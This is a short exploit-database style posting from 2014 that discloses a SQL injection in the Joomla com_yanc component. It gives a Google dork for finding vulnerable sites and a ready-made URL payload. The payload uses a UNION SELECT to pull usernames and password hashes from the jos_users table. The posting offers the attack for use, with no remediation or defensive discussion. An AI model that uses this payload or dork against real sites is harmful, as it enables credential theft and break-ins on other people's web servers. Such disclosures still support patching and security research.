facebook facebook twitter rss

Joomla com_yanc Sql Injection Vulnerability

Author: Xtroj-EnTn , Published: 25-09-2014
#Exploit Title :Joomla com_yanc Sql Injection Vulnerability

# Author : Xtroj-EnTn

# Risk : low

# Class: Remote

# Google Dork: inurl:index.php?option=com_yanc "listid"

# Date: 24/09/2014

# contact me: Virus-tn@hotmail.com

# Script: Joomla

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

~ Exploit ~
---------------------------------------------------------------------------------------------------------------------------
http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--|

Like us on Facebook :